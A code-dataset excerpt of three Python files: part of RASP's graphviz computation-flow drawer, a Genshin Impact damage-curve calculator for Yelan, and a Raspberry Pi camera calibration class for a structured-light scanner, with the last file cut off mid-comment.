connect(g,top_table,bottom_table,select_vals):\n\t# connects top_table as k and bottom_table as q\n\tif top_table.empty or bottom_table.empty:\n\t\treturn # not doing this for now\n\tplace_above(g,top_table,bottom_table)\n\t# just so it positions them one on top of the other, even if select is empty\n\tfor q_i in select_vals:\n\t\tfor k_i,b in enumerate(select_vals[q_i]):\n\t\t\tif b:\n\t\t\t\t# have to add 2 cause first 2 are data type and row name\n\t\t\t\tg.edge(top_table.bottom_access_portstr(k_i,skip_meta=True),\n\t\t\t\t\t bottom_table.top_access_portstr(q_i,skip_meta=True),\n\t\t\t\t\t arrowhead='none')\n\nclass SubHead:\n\tdef __init__(self,name,seq):\n\t\tvvars = seq.get_immediate_parent_sequences()\n\t\tif not seq.definitely_uses_identity_function:\n\t\t\tvreal = seq.pre_aggregate_comp()\n\t\t\tvreal(seq.last_w) # run it on same w to fill with right results\n\t\t\tvreals = [vreal]\n\t\telse:\n\t\t\tvreals = []\n\n\t\tself.name = name\n\t\tself.vvars_table = Table({VVAR:vvars,VREAL:vreals},self.name+\"_vvars\",rowtype_order=[VVAR,VREAL]) \n\t\tself.res_table = Table({RES:[seq]},self.name+\"_res\")\n\t\tself.default = \"default: \"+str(seq.default) if not None is seq.default else \"\"\n\t\t# self.vreals_table = ## ? add partly processed vals, useful for eg conditioned_contains?\n\t\n\tdef add_to_graph(self,g):\n\t\tself.vvars_table.add_to_graph(g)\n\t\tself.res_table.add_to_graph(g)\n\t\tif self.default:\n\t\t\tg.node(self.name+\"_default\",shape='rectangle',label=self.default)\n\t\t\tg.edge(self.name+\"_default\",self.res_table.top_left_portstr(),\n\t\t\t\t\t\t\tarrowhead='none')\n\n\tdef add_edges(self,g,select_vals):\n\t\tconnect(g,self.vvars_table,self.res_table,select_vals)\n\n\tdef bottom_left_portstr(self):\n\t\treturn self.res_table.bottom_left_portstr()\n\tdef bottom_right_portstr(self):\n\t\treturn self.res_table.bottom_right_portstr()\n\tdef top_left_portstr(self):\n\t\treturn self.vvars_table.top_left_portstr()\n\tdef top_right_portstr(self):\n\t\treturn self.vvars_table.top_right_portstr()\n\nclass Head:\n\tdef __init__(self,name,head_primitives,i):\n\t\tself.name = name\n\t\tself.i = i\n\t\tself.head_primitives = head_primitives\n\t\tselect = self.head_primitives.select\n\t\tq_vars, k_vars = select.q_vars, select.k_vars\n\t\tq_vars = sorted(list(set(q_vars)),key=lambda a:a.creation_order_id)\n\t\tk_vars = sorted(list(set(k_vars)),key=lambda a:a.creation_order_id)\n\t\tself.kq_table = Table({QVAR:q_vars,KVAR:k_vars},self.name+\"_qvars\",rowtype_order=[KVAR,QVAR])\n\t\t# self.k_table = Table({KVAR:k_vars},self.name+\"_kvars\")\n\t\tself.select_result_table = makeQKStable(q_vars,k_vars,select,self.name+\"_select\")\n\t\t# self.select_table = SelectTable(self.head_primitives.select,self.name+\"_select\")\n\t\tself.subheads = [SubHead(self.name+\"_subcomp_\"+str(i),seq) for i,seq in \\\n\t\t\t\t\t\t\t\t\t\t\t\tenumerate(self.head_primitives.sequences)]\n\n\tdef add_to_graph(self,g):\n\t\twith g.subgraph(name=self.name) as head:\n\t\t\tdef headlabel():\n\t\t\t\t# return self.head_primitives.select.name\n\t\t\t\treturn 'head '+str(self.i)+\\\n\t\t\t\t\t\t\t\"\\n(\"+self.head_primitives.select.name+\")\"\n\t\t\thead.attr(fillcolor=head_color, label=headlabel(), \n\t\t\t\t\t\t\t\tfontcolor='black', style='filled')\n\t\t\twith head.subgraph(name=self.name+\"_select_parts\") as sel:\n\t\t\t\tsel.attr(rankdir=\"LR\",label=\"\",style=\"invis\",rank=\"same\")\n\t\t\t\tif True: # not (self.kq_table.empty):\n\t\t\t\t\tself.select_result_table.add_to_graph(sel)\n\t\t\t\t\tself.kq_table.add_to_graph(sel)\n\t\t\t\t\t# sel.edge(self.kq_table.bottom_right_portstr(),\n\t\t\t\t\t\t# self.select_result_table.bottom_left_portstr(),style=\"invis\")\n\t\t\t\n\t\t\t[s.add_to_graph(head) for s in self.subheads]\n\n\tdef add_organising_edges(self,g):\n\t\tif self.kq_table.empty:\n\t\t\treturn\n\t\tfor s in self.subheads:\n\t\t\tplace_above(g,self.select_result_table,s)\n\n\tdef bottom_left_portstr(self):\n\t\treturn self.subheads[0].bottom_left_portstr()\n\tdef bottom_right_portstr(self):\n\t\treturn self.subheads[-1].bottom_right_portstr()\n\tdef top_left_portstr(self):\n\t\tif not (self.kq_table.empty):\n\t\t\treturn self.kq_table.top_left_portstr()\n\t\telse: # no kq (and so no select either) table. go into subheads\n\t\t\treturn self.subheads[0].top_left_portstr()\n\tdef top_right_portstr(self):\n\t\tif not (self.kq_table.empty):\n\t\t\treturn self.kq_table.top_right_portstr()\n\t\telse:\n\t\t\treturn self.subheads[-1].top_right_portstr()\n\n\n\tdef add_edges(self,g):\n\t\tselect_vals = self.head_primitives.select.last_val()\n\t\t# connect(g,self.k_table,self.q_table,select_vals)\n\t\tfor s in self.subheads:\n\t\t\ts.add_edges(g,select_vals)\n\t\tself.add_organising_edges(g)\n\t\t\t\ndef contains_tokens(mvs):\n\treturn next((True for mv in mvs if guarded_contains(base_tokens,mv)),False)\n\nclass Layer:\n\tdef __init__(self,depth,d_heads,d_ffs,add_tokens_on_ff=False):\n\t\tself.heads = []\n\t\tself.depth = depth\n\t\tself.name = self.layer_cluster_name(depth)\n\t\tfor i,h in enumerate(d_heads):\n\t\t\tself.heads.append(Head(self.name+\"_head\"+str(i),h,i))\t\t\t\n\t\tff_parents = []\n\t\tfor ff in d_ffs:\n\t\t\tff_parents += ff.get_nonminor_parent_sequences()\n\t\tff_parents = list(set(ff_parents))\n\t\tff_parents = [p for p in ff_parents if not guarded_contains(d_ffs,p)]\n\t\trows_by_type = {RES:d_ffs,VVAR:ff_parents}\n\t\trowtype_order = [VVAR,RES]\n\t\tif add_tokens_on_ff and not contains_tokens(ff_parents):\n\t\t\trows_by_type[INPUT] = [tokens_asis]\n\t\t\trowtype_order = [INPUT] + rowtype_order\t\t\n\t\tself.ff_table = Table(rows_by_type,self.name+\"_ffs\",rowtype_order) \n\n\tdef bottom_object(self):\n\t\tif not self.ff_table.empty:\n\t\t\treturn self.ff_table\n\t\telse:\n\t\t\treturn self.heads[-1]\n\tdef top_object(self):\n\t\tif self.heads:\n\t\t\treturn self.heads[0]\n\t\telse:\n\t\t\treturn self.ff_table\n\tdef bottom_left_portstr(self):\n\t\treturn self.bottom_object().bottom_left_portstr()\n\tdef bottom_right_portstr(self):\n\t\treturn self.bottom_object().bottom_right_portstr()\n\tdef top_left_portstr(self):\n\t\treturn self.top_object().top_left_portstr()\n\tdef top_right_portstr(self):\n\t\treturn self.top_object().top_right_portstr()\n\n\tdef add_to_graph(self,g):\n\t\twith g.subgraph(name=self.name) as l:\n\t\t\tl.attr(fillcolor=layer_color, label='layer '+str(self.depth), \n\t\t\t\t\t\tfontcolor='black', style='filled')\n\t\t\tfor h in self.heads:\n\t\t\t\th.add_to_graph(l)\n\t\t\tself.ff_table.add_to_graph(l)\n\n\tdef add_organising_edges(self,g):\n\t\tif self.ff_table.empty:\n\t\t\treturn\n\t\tfor h in self.heads:\n\t\t\tplace_above(g,h,self.ff_table)\n\n\tdef add_edges(self,g):\n\t\tfor h in self.heads:\n\t\t\th.add_edges(g)\n\t\tself.add_organising_edges(g)\n\n\tdef layer_cluster_name(self,depth):\n\t\treturn 'cluster_l'+str(depth) # graphviz needs \n\t\t\t\t\t# cluster names to start with 'cluster'\n\nclass CompFlow:\n\tdef __init__(self,all_heads,all_ffs,force_vertical_layers,add_tokens_on_ff=False):\n\t\tself.force_vertical_layers = force_vertical_layers\n\t\tself.add_tokens_on_ff = add_tokens_on_ff\n\t\tself.make_all_layers(all_heads,all_ffs)\n\tdef make_all_layers(self,all_heads,all_ffs):\n\t\tself.layers = []\n\t\tff_depths = [seq.scheduled_comp_depth for seq in all_ffs]\n\t\thead_depths = [h.comp_depth for h in all_heads]\n\t\tdepths = sorted(list(set(ff_depths+head_depths)))\n\t\tfor d in depths:\n\t\t\td_heads = [h for h in all_heads if h.comp_depth==d]\n\t\t\td_heads = sorted(d_heads,key=lambda h:h.select.creation_order_id) \n\t\t\t\t\t# only important for determinism to help debug\n\t\t\td_ffs = [f for f in all_ffs if f.scheduled_comp_depth == d]\n\t\t\tself.layers.append(Layer(d,d_heads,d_ffs,self.add_tokens_on_ff))\n\n\tdef add_all_layers(self,g):\n\t\t[l.add_to_graph(g) for l in self.layers]\n\n\tdef add_organising_edges(self,g):\n\t\tif self.force_vertical_layers:\n\t\t\tfor l1,l2 in zip(self.layers,self.layers[1:]):\n\t\t\t\tplace_above(g,l1,l2)\n\n\tdef add_edges(self,g):\n\t\tself.add_organising_edges(g)\n\t\t[l.add_edges(g) for l in self.layers]\n\n@UnfinishedFunc\ndef draw_comp_flow(self,w,filename=None,\n\t\t\t\tkeep_dot=False,show=True,\n\t\t\t\tforce_vertical_layers=True, add_tokens_on_ff=False): \n\tif not None is w:\n\t\tself(w) # execute seq (and all its ancestors) on the given input w. \n\t\t# if w==None, assume seq has already been executed on some input.\n\t\tif not self.last_w == w:\n\t\t\tprint(\"evaluating input failed\")\n\t\t\treturn\n\telse:\n\t\tw = self.last_w\n\tif None is filename:\n\t\tname = self.name\n\t\tfilename=os.path.join(\"comp_flows\",windows_path_cleaner(name+\"(\"+(str(w) if not isinstance(w,str) else \"\\\"\"+w+\"\\\"\")+\")\"))\n\tself.mark_all_minor_ancestors()\n\tself.make_display_names_for_all_parents(skip_minors=True)\n\t\n\tall_heads,all_ffs = self.get_all_ancestor_heads_and_ffs(remove_minors=True) \n\t\t# this scheduling also marks the analysis parent selects\n\tcompflow = CompFlow(all_heads,all_ffs,\n\t\t\t\t\tforce_vertical_layers=force_vertical_layers,\n\t\t\t\t\tadd_tokens_on_ff = add_tokens_on_ff)\n\n\t# only import graphviz *inside* this function - \n\t# that way RASP can run even if graphviz setup fails\n\t# (though it will not be able to draw computation flows without it)\n\tfrom graphviz import Digraph \n\tg = Digraph('g')\n\tg.attr(splines='polyline') # with curved lines it fusses over separating score edges\n\t\t\t\t# and makes weirdly curved ones that start overlapping with the sequences :(\n\tcompflow.add_all_layers(g)\n\tcompflow.add_edges(g)\n\timg_filename = g.render(filename=filename) # img_filename will end with png or something, filename is an intermediate\n\tif show:\n\t\tg.view()\n\tif not keep_dot:\n\t\tos.remove(filename)","repo_name":"tech-srl/RASP","sub_path":"RASP_support/DrawCompFlow.py","file_name":"DrawCompFlow.py","file_ext":"py","file_size_in_byte":18903,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"44"} +{"seq_id":"11534731715","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nclass Stat():\n def init(self, hp, basehp, crit1, crit2, inc, resist, ainc, qinc):\n self.hp = hp\n self.basehp = basehp\n self.crit1 = crit1\n self.crit2 = crit2\n self.crit = 1 + crit1 * crit2\n self.inc = 1 + inc\n resist = 0.1 - resist\n if(resist < 0):\n self.resist = (1 - resist / 2) * 0.5\n else:\n self.resist = (1 - resist) * 0.5\n self.ainc = ainc\n self.qinc = qinc\n \n def calc(self, sec, base):\n hp = self.hp\n if(sec >= 2.4):\n hp += self.basehp * 0.1\n if(sec >= 3.4):\n hp += self.basehp * 0.1\n inc = self.inc + min(50, 1 + 3.5 * np.floor(sec)) / 100\n damage = base * hp * self.crit * inc * self.resist\n #print(sec, base, hp, self.inc, inc, self.crit, self.resist, damage)\n return damage\n\n def A(self, sec):\n base = 0.325104\n self.inc += self.ainc\n res = self.calc(sec, base)\n self.inc -= self.ainc\n return res\n\n def E(self, sec):\n base = 0.481\n res = self.calc(sec, base)\n return res\n\n def Q(self, sec):\n base = 0.3151\n self.inc += self.qinc\n res = self.calc(sec, base)\n self.inc -= self.qinc\n return res\n \n def Q0(self, sec):\n base = 0.1553\n self.inc += self.qinc\n res = self.calc(sec, base)\n self.inc -= self.qinc\n return res\n\n def Q2(self, sec):\n base = 0.14\n self.inc += self.qinc\n res = self.calc(sec, base)\n self.inc -= self.qinc\n return res\n\nA = [1.8, 2.8, 3.8, 4.1, 4.5]\nE = [2.4, 3.4]\nQ = [1.8, 2.4, 2.8, 3.4, 3.8, 4.8, 5.8, 6.8, 7.8, 8.9, 9.9, 10.9, 11.9, 12.9, 13.9, 14.9]\nQ2 = [1.8, 3.7, 6.1, 8.1, 10.2, 12.2, 14.2]\nQ0 = [1.2]\n\ndef calc(yelan, title):\n dam_dict = {}\n\n tot_a = 0\n tot_e = 0\n tot_q = 0\n for sec in A:\n tot_a += yelan.A(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.A(sec)\n\n for sec in E:\n tot_e += yelan.E(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.E(sec)\n\n for sec in Q:\n tot_q += yelan.Q(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.Q(sec)\n\n for sec in Q2:\n tot_q += yelan.Q2(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.Q2(sec)\n\n for sec in Q0:\n tot_q += yelan.Q0(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.Q0(sec)\n\n print(title)\n print('生命值:', yelan.hp, '暴击率:', yelan.crit1 * 100, '% 暴击伤害:', yelan.crit2 * 100, '%')\n print('Total: ',tot_a + tot_e + tot_q)\n print('A: ', tot_a / (tot_a + tot_e + tot_q) * 100, '% ', tot_a)\n print('E: ', tot_e / (tot_a + tot_e + tot_q) * 100, '% ', tot_e)\n print('Q: ', tot_q / (tot_a + tot_e + tot_q) * 100, '% ', tot_q)\n\n dam_dict = dict(sorted(dam_dict.items(), key=lambda x : x[0], reverse = False))\n damage = 0\n tempx, tempy = [], []\n for (sec, dam) in dam_dict.items():\n damage += dam\n tempx.append(sec)\n tempy.append(damage)\n \n return tempx, tempy\n\n\ndef Work(title, hp, basehp, crit1, crit2, inc, resist, ainc, qinc, Crit1, Crit2, HP):\n yelan = Stat()\n fig, ax = plt.subplots()\n plt.rcParams['font.family'] = ['sans-serif']\n plt.rcParams['font.sans-serif'] = ['SimHei']\n\n print(title)\n yelan.init(hp = HP, basehp = basehp, crit1 = Crit1, crit2 = Crit2, inc = inc, resist = resist, ainc = 0, qinc = qinc)\n tx, ty = calc(yelan, '四绝缘')\n ax.plot(tx, ty, c = 'purple', label = '四绝缘')\n mintime = -1\n\n yelan.init(hp = hp + basehp * 0.2, basehp = basehp, crit1 = crit1, crit2 = crit2, inc = inc + 0.15, resist = resist, ainc = 0, qinc = 0)\n tempx, tempy = calc(yelan, '二水二千岩')\n for i in range(5, len(tx)):\n if(ty[i] > tempy[i]):\n mintime = max(mintime, tx[i])\n break\n if(i == len(tx) - 1):\n mintime = 16\n ax.plot(tempx, tempy, c = 'green', label = '二水二千岩')\n\n yelan.init(hp = hp, basehp = basehp, crit1 = crit1, crit2 = crit2, inc = inc + 0.15, resist = resist, ainc = 0, qinc = 0.2)\n tempx, tempy = calc(yelan, '二水二宗室')\n for i in range(5, len(tx)):\n if(ty[i] >= tempy[i]):\n mintime = max(mintime, tx[i])\n break\n if(i == len(tx) - 1):\n mintime = 16\n ax.plot(tempx, tempy, c = 'pink', label = '二水二宗室')\n\n yelan.init(hp = hp, basehp = basehp, crit1 = crit1, crit2 = crit2, inc = inc + 0.15, resist = resist, ainc = 0.3, qinc = 0)\n tempx, tempy = calc(yelan, '四水')\n for i in range(5, len(tx)):\n if(ty[i] >= tempy[i]):\n mintime = max(mintime, tx[i])\n break\n if(i == len(tx) - 1):\n mintime = 16\n ax.plot(tempx, tempy, c = 'blue', label = '四水')\n\n if(mintime > 0 and mintime <= 15):\n print('绝缘4套装将在', mintime, 's赶超其他圣遗物套装')\n\n '''\n ax.tick_params(bottom = 'off', top = 'off', left = 'off', right = 'off')\n for key, spine in ax.spines.items():\n spine.set_visible(False)\n '''\n ax.legend(loc = 'upper right')\n ax.set_title(title)\n plt.xlabel('时间')\n plt.ylabel('伤害期望')\n fig.savefig(title + '.png', dpi = 600, format = 'png')\n\n\n\n\nWork('100充能下夜兰单人时间-伤害曲线', hp = 35645.2, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666, resist = 0, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2)\nWork('120充能下夜兰单人时间-伤害曲线', hp = 33044.2, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666, resist = 0, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2)\nWork('140充能下夜兰单人时间-伤害曲线', hp = 30385.4, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666, resist = 0, ainc = 0, qinc = 0.35, Crit1 = 1, Crit2 = 2.242, HP = 33044.2)\nWork('160充能下夜兰单人时间-伤害曲线', hp = 29142.7, basehp = 14450, crit1 = 0.972, crit2 = 2.176, inc = 0.666, resist = 0, ainc = 0, qinc = 0.4, Crit1 = 1, Crit2 = 2.242, HP = 30385.4)\nWork('180充能下夜兰单人时间-伤害曲线', hp = 29142.7, basehp = 14450, crit1 = 0.913, crit2 = 2.057, inc = 0.666, resist = 0, ainc = 0, qinc = 0.45, Crit1 = 0.972, Crit2 = 2.176, HP = 29142.7)\n\n\nWork('100充能下夜兰组队时间-伤害曲线', hp = 35645.2 + 5346.5, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2 + 5346.5)\nWork('120充能下夜兰组队时间-伤害曲线', hp = 33044.2 + 5346.5, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2 + 5346.5)\nWork('140充能下夜兰组队时间-伤害曲线', hp = 30385.4 + 5346.5, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.35, Crit1 = 1, Crit2 = 2.242, HP = 33044.2 + 5346.5)\nWork('160充能下夜兰组队时间-伤害曲线', hp = 29142.7 + 5346.5, basehp = 14450, crit1 = 0.972, crit2 = 2.176, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.4, Crit1 = 1, Crit2 = 2.242, HP = 30385.4 + 5346.5)\nWork('180充能下夜兰组队时间-伤害曲线', hp = 29142.7 + 5346.5, basehp = 14450, crit1 = 0.913, crit2 = 2.057, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.45, Crit1 = 0.972, Crit2 = 2.176, HP = 29142.7 + 5346.5)\n","repo_name":"leimu998/E55555","sub_path":"test./1545.py","file_name":"1545.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"40619111327","text":"from picamera import PiCamera\nimport numpy as np\nfrom natsort import natsorted\nimport cv2 as cv\nimport glob\nimport os\nfrom .projector import Projector\nfrom scipy import ndimage\n\n\"\"\"\n Генериране на шаблони за сканиране\n\"\"\"\nclass CameraPi:\n\n CALIBRATION_DIR = \"./Camera_Calib\" # Директория съдържаща снимките за калибриране и файла с резултата\n CALIBRATION_FILE = \"/CalibResult.json\" # Файл с резултата от калибрирането\n CALIBRATION_RES_IMAGE = \"/CalibResult.jpg\" # Файл с резултата от калибрирането\n\n STEREO_CALIBRATION_DIR = \"./Stereo_Calib\" # Резултатът от стерео калибрирането се записва в главната директория\n STEREO_CALIBRATION_FILE = \"/StereoCalibResult.json\" # Файл с резултата от калибрирането\n\n # Инициализиране на необходимите параметри на камерата\n def __init__(self):\n # зареждане на вътрешните параметри на камерата\n self.cCalibrationRes = self.readCalibrationResult(self.CALIBRATION_DIR)\n # зареждане на вътрешните параметри от стерео калибрирането\n self.stereoCalibrationRes = self.readStereoCalibrationResult()\n\n \"\"\"\n Прави снимка с камерата и връща името на jpg файла.\n \"\"\"\n def takePhoto(self, dir, imageInd=\"\"):\n imageFullName = '{0}/image{1}.jpg'.format(dir,imageInd)\n print(imageFullName)\n with PiCamera() as camera:\n # preview е само за debug\n camera.stop_preview()\n camera.capture(imageFullName)\n camera.stop_preview()\n return imageFullName\n\n \"\"\"\n Връщане на резултат от калибрирането според подадената директория, в която ще се използва\n \"\"\"\n def getUndistortCalibrationRes(self, dir):\n calibRes = None\n # Ако е калибриране на прожектора, то се прилага калибрирането на камерата\n if dir.startswith(Projector.CALIBRATION_DIR):\n calibRes= {\n \"matrix\" : self.cCalibrationRes[\"matrix\"],\n \"distortion\" : self.cCalibrationRes[\"distortion\"],\n \"newCameraMatrix\": self.cCalibrationRes[\"newCameraMatrix\"],\n \"roi\": self.cCalibrationRes[\"roi\"]\n }\n # Ако не е калибриране на камерата или стерео, то се опитва да се приложи резултата от стерео калибрирането\n elif (not dir.startswith(self.CALIBRATION_DIR) and\n not dir.startswith(self.STEREO_CALIBRATION_DIR)):\n # При стерео калибрацията няма newCameraMatrix и се подава None\n # тогава се оправяне на изкривяването се използва само matrix\n calibRes= {\n \"matrix\" : self.stereoCalibrationRes[\"cameraMatrix\"],\n \"distortion\" : self.stereoCalibrationRes[\"cameraDistortion\"],\n \"newCameraMatrix\": None,\n \"roi\": self.stereoCalibrationRes[\"cRoi\"]\n }\n return calibRes\n\n # Зарежда и \"изправя\" изображението, ако е приложимо\n def loadImage(self, fname,flag=cv.IMREAD_COLOR):\n img = cv.imread(fname, flag)\n calibRes = self.getUndistortCalibrationRes(fname)\n\n # if calibRes != None:\n # img = self.undistortImage(img,calibRes)\n return img\n\n #Прочита изображенията за определен шаблон\n def loadPatternImages(self, dir, patternCode, scan_no, readType = cv.IMREAD_GRAYSCALE, img_no='?'):\n # Зареждат се всички изображения, които отговорят на шаблона\n # img_no - ?(точно един символ),*(0 или повече символи),конретно чисто(зарежда изображението с конкретен номер)\n imgsNames = natsorted(glob.glob('{0}/image{1}{2}{3}.jpg'.format(dir,scan_no,patternCode,img_no)))\n imgs = [] # масив със заредените изображения\n img = None\n for fname in imgsNames:\n img = self.loadImage(fname,readType)\n imgs.append(img)\n return np.array(imgs)\n\n \"\"\"\n Стерео калибриране на камерата и проектора.\n patt - шаблонът на шахматна дъска, който е бил прожектиран и заснет от камерата. Ще бъде представен\n \"като това, което вижда проектора, ако беше камера\".\n projCalibResults - зарежда се в structuredlight, защото трябва да се вземе размера на проектора за генериране на шаблон\n \"\"\"\n def stereoCalibrate(self, chessboardSize, projCalibResults):\n camCalibResults = self.cCalibrationRes\n objpoints, camImgpoints, projImgpoints = self.stereoFindChessboardCorners(chessboardSize)# Точките на дъската, в изображението на камерата и в проектора.\n\n # cv.CALIB_USE_INTRINSIC_GUESS - преизчислява cameraMatrix, cameraDistortion, projectorMatrix, projectorDistortion\n # r_matrix, t_vecs - rotation и transition между камерата и проектораl. Това основно се използва за\n # essentialMatrix, fundamentalMatrix - 3x3 матрици. Свързват съответните точки в стеро изображение. essentialMatrix може да се разглежда като предшественик на fundamentalMatrix\n ret, cameraMatrix, cameraDistortion, projectorMatrix, projectorDistortion, r_matrix, t_vecs, essentialMatrix, fundamentalMatrix = \\\n cv.stereoCalibrate(objpoints, camImgpoints, projImgpoints, camCalibResults[\"matrix\"], camCalibResults[\"distortion\"],\n projCalibResults[\"matrix\"], projCalibResults[\"distortion\"], tuple(camCalibResults[\"shape\"]),flags = cv.CALIB_USE_INTRINSIC_GUESS)\n\n # camRectTransMat, projRectTransMat, camProjectionMatrix, projProjectionMatrix -\n # disparityToDepthMatrix - 4x4 матрица трансформираща преспективата(Q) за преобразуване на пиксели disparity в съответните [x, y, z]\n # cRoi, pRoi - използва се изрязване само да валидната област на изображението след калибриране, но не работи вярно и дава координати (0,0),(0,0), т.е. нищо не е валидно.\n camRectTransMat, projRectTransMat, camProjectionMatrix, projProjectionMatrix, disparityToDepthMatrix, cRoi, pRoi = \\\n cv.stereoRectify(cameraMatrix, cameraDistortion, projectorMatrix, projectorDistortion, tuple(camCalibResults[\"shape\"]), r_matrix, t_vecs)\n\n # запиване на резултата от калибрирането\n stereoCalibrationRes = {\n \"cShape\" : camCalibResults[\"shape\"],\n \"pShape\" : projCalibResults[\"shape\"],\n \"cameraMatrix\": cameraMatrix,\n \"cameraDistortion\": cameraDistortion,\n \"cRoi\": cRoi,\n \"projectorMatrix\": projectorMatrix,\n \"projectorDistortion\": projectorDistortion,\n \"pRoi\": pRoi,\n \"r_matrix\": r_matrix,\n \"t_vecs\": t_vecs,\n \"disparityToDepthMatrix\": disparityToDepthMatrix\n }\n self.writeStereoCalibrationResult(stereoCalibrationRes)\n\n \"\"\"\n Калибриране на камерата.\n Източник: https://docs.opencv.org/4.x/dc/dbb/tutorial_py_calibration.html\n chessboardSize: Размерите на шаха.Трябва да са точни иначе findChessboardCorners ще върне false.\n (8,6)\n chessBlockSize: Ширина на едно кврадче от дъската\n size: Размера на изображението. Попълва се при проектора.\n !!!ВАЖНО: В снимките за калибиране трябва да са такива, при които дъската е много близо до ръба,\n защото иначе калибриране е грешно и изкривява крайното изображениета\n * https://answers.opencv.org/question/28438/undistortion-at-far-edges-of-image/\n \"\"\"\n def calibrate(self, calibrationDir, chessboardSize, chessBlockSize, size=None):\n # Критерии за спиране на търсенето. Използва се в cornerSubPix, което намира по-точно ъглите на дъската\n # (type:COUNT,EPS or COUNT + EPS(2+1),maxCount iteration,\n # epsilon: при каква точност или промяна на стойност алгоритъма спира)\n criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n lastImageWithPattern = None #после изображение с намерен шаблон //После за тест на калибрирането\n\n # масив нули с редове #ъгли и 3 колони\n objp = np.zeros((chessboardSize[0]*chessboardSize[1],3), np.float32) #[56][3]\n # прави масива като (size*0,size*0,size*0), (size*1,size*0,size*0), (size*2,size*0,size*0) ....,(size*6,size*5,size*0)\n # един вид все едно в реалния свят са size*1,size*2,size*3,...\n # size* е реалния размер на квадрат на дъската. Така лесно се преобразуват пискели в реални дълбини\n objp[:,:2] = chessBlockSize * np.mgrid[0:chessboardSize[0],0:chessboardSize[1]].T.reshape(-1,2)\n\n # Масиви за съхранение точките на обекта и точките в избражението\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n matched_pattern_cnt = 0 #брой намерени шаблони. Трябва да са поне 12, за да е коректно калибрирането.\n\n # взима имената на изображениета *.jpg от директорията сортирани по естествен начин\n images = natsorted(glob.glob('{0}/{1}'.format(calibrationDir,'image*.jpg')))\n for fname in images:\n print(fname)\n # Намиране на ъглите на квадратите\n ret, corners = self.findChessboardCorners(fname, chessboardSize)\n if ret == True:\n matched_pattern_cnt += 1\n lastImageWithPattern = fname\n print(\"Found pattern in \" + fname)\n # намира по-точнит�� пиксел на ъгълите(изобр.,ъгли, 1/2 от страничната\n # дължина за търсене(???), няма zeroZone,критерии за спиране)\n # corners2 = cv.cornerSubPix(gray,corners, (11,11), (-1,-1), criteria)\n # cv.drawChessboardCorners(img, (chessboardSize[0],chessboardSize[1]), corners2, ret)\n # cv.imwrite('Corners' + fname, img) #записва изображението с намерените ъгли на дъската\n\n # Добавят се координатите на ъглите. После за калибрирането\n objpoints.append(objp)\n imgpoints.append(corners)\n else:\n # @TODO: Пременно е махнато триенето на изображенията без шаблон\n pass #os.remove(fname)\n\n if lastImageWithPattern is not None and matched_pattern_cnt >= 12:\n img = self.loadImage(lastImageWithPattern)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # Калибриране на камерата(ъгли в обект,ъгли в изображението,размерите на изображението в обратен\n # ред(от -1)(?),без матрица на изображението,без коеф. на изкривяване)\n # return: Флаг за успех(ret), матрица на камерата(matrix), изкривяване(distortion),\n # изходен вектор на ротиране(r_matrix),изходен вектор на транслиране(t_vecs)\n ret, matrix, distortion, r_matrix, t_vecs = cv.calibrateCamera(\n objpoints, imgpoints, gray.shape[::-1], None, None)\n\n h,w = img.shape[:2] # размерите на изображението\n newCameraMatrix, roi = cv.getOptimalNewCameraMatrix(matrix,\n distortion,\n (w,h),0,(w,h))\n\n # Изчисляване на грешката\n mean_error = 0\n for i in range(len(objpoints)):\n imgpoints2, _ = cv.projectPoints(objpoints[i], r_matrix[i], t_vecs[i], matrix, distortion)\n error = cv.norm(imgpoints[i], imgpoints2, cv.NORM_L2)/len(imgpoints2)\n mean_error += error\n err = mean_error/len(objpoints)\n print( \"total error: {}\".format(err))\n # запиване на резултата от калибрирането\n calibrationRes = {\n \"shape\" : gray.shape if size is None else size, # записва се подадения ръчно размер, иначе се взима този на изображението(използва се за проектора)\n \"matrix\": matrix,\n \"distortion\": distortion,\n \"newCameraMatrix\": newCameraMatrix,\n \"roi\": roi,\n \"error\": err\n }\n self.writeCalibrationResult(calibrationDir,calibrationRes)\n\n # Прочитане на резултата от калибрирането\n calibrationRes = self.readCalibrationResult(calibrationDir)\n img = self.undistortImage(img, calibrationRes, calibrationDir)\n else:\n raise ValueError('Not enough matched patterns({0})!'.format(matched_pattern_cnt))\n\n # Намиране на ъглите на квадратите\n # return -> ret: дали са намерени ъгли, corners: координати на ъглите\n def findChessboardCorners(self, fname, chessboardSize):\n img = self.loadImage(fname, cv.IMREAD_GRAYSCALE) #чете изображението и преображуване в черно-бяло\n # Намиране на ъглите на квадратите(сиво изображение, размер на дъска, без флагове)\n # ret: дали са намерени ъгли, corners: координати на ъглите\n return cv.findChessboardCorners(img,(chessboardSize[0],chessboardSize[1]), None, 0)\n\n # Стерео 